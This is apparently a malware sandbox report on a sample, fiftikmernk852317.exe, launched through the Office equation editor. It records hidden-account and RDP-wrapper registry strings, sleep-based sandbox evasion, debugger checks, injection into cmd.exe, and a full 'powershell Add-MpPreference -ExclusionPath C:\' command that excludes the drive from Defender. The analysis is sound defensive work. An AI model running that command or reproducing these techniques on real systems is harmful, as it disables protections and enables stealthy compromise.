            Source: fiftikmernk852317.exe, 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: fiftikmernk852317.exe, 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: fiftikmernk852317.exe, 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: fiftikmernk852317.exe, 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: fiftikmernk852317.exe, 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: fiftikmernk852317.exe, 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: fiftikmernk852317.exe, 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Found stalling execution ending in API Sleep call
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeStalling execution: Execution stalls by calling Sleep
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1424Thread sleep time: -240000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe TID: 1936Thread sleep count: 129 > 30
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe TID: 1936Thread sleep time: -64500s >= -30000s
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe TID: 2648Thread sleep count: 58 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2864Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\cmd.exe TID: 2296Thread sleep count: 628 > 30
            Source: C:\Windows\SysWOW64\cmd.exe TID: 2296Thread sleep time: -7536000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 628
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009B002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
            Source: EQNEDT32.EXE, 00000002.00000002.910734013.000000000070A000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000000.907228989.0000000000FE7000.00000008.00000001.01000000.00000004.sdmp, fiftikmernk852317.exe, 00000005.00000002.1180866900.0000000000FE7000.00000004.00000001.01000000.00000004.sdmp, fiftikmernk852317.exe, 00000005.00000002.1181749722.0000000004285000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.1180708241.0000000002B45000.00000004.00001000.00020000.00000000.sdmp, fiftikmernk852317.exe, 0000000A.00000000.1009097709.0000000000FE7000.00000008.00000001.01000000.00000004.sdmp, fiftikmernk852317.exe, 0000000A.00000002.1070424601.0000000000FE7000.00000004.00000001.01000000.00000004.sdmp, fiftikmernk852317.exe.2.dr, fifthikmerozx[1].exe.2.drBinary or memory string: .?AVCRegistryVirtualMachine@ATL@@
            Source: powershell.exe, 00000006.00000002.988136023.00000000004D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
            Source: EQNEDT32.EXE, 00000002.00000002.910734013.000000000070A000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000002.1181749722.0000000004285000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.1180708241.0000000002B45000.00000004.00001000.00020000.00000000.sdmp, fiftikmernk852317.exe.2.dr, fifthikmerozx[1].exe.2.drBinary or memory string: @.?AVCRegistryVirtualMachine@ATL@@
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_01EF096A GetSystemInfo,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009A9DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AFF27 FindFirstFileW,FindNextFileW,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AFA42 LoadLibraryA,GetProcAddress,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009B094E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009B0619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009B0620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_0243028D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_0242FF58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_0242FF5F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_02420467 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_024384B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_000B001A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD807F IsDebuggerPresent,OutputDebugStringW,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD2520 GetProcessHeap,__Init_thread_footer,
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD8EDC SetUnhandledExceptionFilter,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD8D4A IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD87A1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: B0000 protect: page execute and read and write
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: C0000 protect: page read and write
            Creates a thread in another existing process (thread injection)
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeThread created: C:\Windows\SysWOW64\cmd.exe EIP: B010E
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: B0000
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: C0000
            Contains functionality to inject threads in other processes
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009B1FD8 RegSetValueExA,OpenProcess,GetCurrentProcessId,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009A79E8 OpenProcess,VirtualAllocEx,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, explorer.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\fiftikmernk852317.exe C:\Users\user\AppData\Roaming\fiftikmernk852317.exe
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
